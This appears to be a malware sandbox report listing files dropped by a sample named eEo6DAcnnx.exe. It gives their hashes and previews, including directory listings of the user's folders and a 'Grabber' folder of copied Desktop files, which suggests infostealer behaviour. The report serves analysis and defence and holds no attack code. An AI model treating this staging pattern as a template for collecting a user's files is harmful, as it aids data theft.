MD5:	20886A0B3D437A0E8CFFE54CDED5DD4A
SHA1:	A760AD6FD61B91155F7D5D8BF9C0EF4E480966CF
SHA-256:	04527F3CBFFAC65303A36F5E149B111DC4F6231935DB7627B0A79D81FB503A03
SHA-512:	695E18F08CA3328933119FF7F08F734C20354238845ECC6121F835CC9173BD357DAFDA5E275D2565077A039567E2630164295755AE7F96414313DD876BF2EC64
Malicious:	false
Preview:	Documents\...EOWRVPQCCS\....EIVQSAOTAQ.pdf....EOWRVPQCCS.docx....EWZCVGNOWT.jpg....GIGIYTFFYT.png....KLIZUSIQEN.mp3....ZGGKNSUKOP.xlsx...GLTYDMDUST\...JDDHMPCDUJ\...LFOPODGVOH\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...TQDFJHPUIU\...ZGGKNSUKOP\....EWZCVGNOWT.xlsx....JDDHMPCDUJ.jpg....KLIZUSIQEN.pdf....NWCXBPIUYI.mp3....NYMMPCEIMA.png....ZGGKNSUKOP.docx...desktop.ini...EIVQSAOTAQ.pdf...EOWRVPQCCS.docx...EWZCVGNOWT.jpg...EWZCVGNOWT.xlsx...GIGIYTFFYT.png...JDDHMPCDUJ.jpg...KLIZUSIQEN.mp3...KLIZUSIQEN.pdf...NWCXBPIUYI.mp3...NYMMPCEIMA.png...ZGGKNSUKOP.docx...ZGGKNSUKOP.xlsx..

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	234
Entropy (8bit):	5.264400545111088
Encrypted:	false
SSDEEP:	6:3tSLK4zPys6TEI/PI/RThOspE3CNHZGLv:QLK4r/6S4sgSHIb
MD5:	BA32CCAFC8B3319D8F0ECE1D04EFC7D1
SHA1:	CDBF9FB3BDA72257ED1FFD5E15319070017DF5D0
SHA-256:	A5307799A471BD61C264679519A5EC47448E5838542A4E36BD48FAAAF44175E6
SHA-512:	3A9D80AD98AC088287A2888C331370DFE8553BB4C31213A5106C50751A2A9609297574F758155B76BDAA3F6DAD3AE999503D55BAAE68E701FA4DB88D383A026F
Malicious:	false
Preview:	Downloads\...desktop.ini...EIVQSAOTAQ.pdf...EOWRVPQCCS.docx...EWZCVGNOWT.jpg...EWZCVGNOWT.xlsx...GIGIYTFFYT.png...JDDHMPCDUJ.jpg...KLIZUSIQEN.mp3...KLIZUSIQEN.pdf...NWCXBPIUYI.mp3...NYMMPCEIMA.png...ZGGKNSUKOP.docx...ZGGKNSUKOP.xlsx..

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Temp.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4017
Entropy (8bit):	5.214684017206253
Encrypted:	false
SSDEEP:	96:4R9CK/6f8gtc0SyrLscx6MjLg2WUwNGIGVmrDyEN7SF6+NZ3H:olMPsGPfgXL9KmyJ
MD5:	E1E0F23A6F0FDA3D2981CEAEDC82D333
SHA1:	2220B6C933133AC394A804B485F0D98BBA2812FF
SHA-256:	9D4AD89C1424E078A27793BAD8989D06499B1F6AE4B3C45E530F7753D0C3F11A
SHA-512:	A8F95BE88BD2C059A8E566B589012985FEF7DFAC12DAEBA5085F0759CB0D2EE664D1C65A7D2076F42013BF40C91FF5EDD6CE48BB16F67DACC6AB3744C2693DED
Malicious:	false
Preview:	Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 08-46-02-125.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 08-46-25-059.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696487428721656700_8183D06E-095C-4C4A-A883-18B083FDA30C.log.....App1696487456555183400_C3B2669B-4862-44CB-BCC1-701EAE43EADE.log.....App1696487468317710800_4F261BAB-FD08-4743-B9C8-E1FB294AE265.log.....App1696487468318250000_4F261BAB-FD08-4743-B9C8-E1FB294AE265.log...edge_BITS_5464_1012409649\....e8d11bd0-b939-446e-b741-2c68ed471a53...edge_BITS_5464_1077836906\....376d5b20-4ccf-4ab3-92ec-d2fa66fb039b...edge_BITS_5464_1239538394\....c78f9967-7a8c-44b0-ad94-732b63c89638...edge_BITS_5464_1567651471\....7f41fcdb-a3ef-47d4-86cb-0f3555d3db82...edge_BITS_5464_17058258\....ef5f792e-9df7-4748-accf-02ec33a4a2c4...edge

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EIVQSAOTAQ.pdf

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692024230831571
Encrypted:	false
SSDEEP:	24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
MD5:	086908C2D2FAA8C9284EAB6D70682A47
SHA1:	1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
SHA-256:	40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
SHA-512:	02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
Malicious:	false
Preview:	EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EOWRVPQCCS\EIVQSAOTAQ.pdf

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692024230831571
Encrypted:	false
SSDEEP:	24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
MD5:	086908C2D2FAA8C9284EAB6D70682A47
SHA1:	1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
SHA-256:	40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
SHA-512:	02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
Malicious:	false
Preview:	EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EOWRVPQCCS\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EOWRVPQCCS\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EOWRVPQCCS\GIGIYTFFYT.png

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EOWRVPQCCS\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
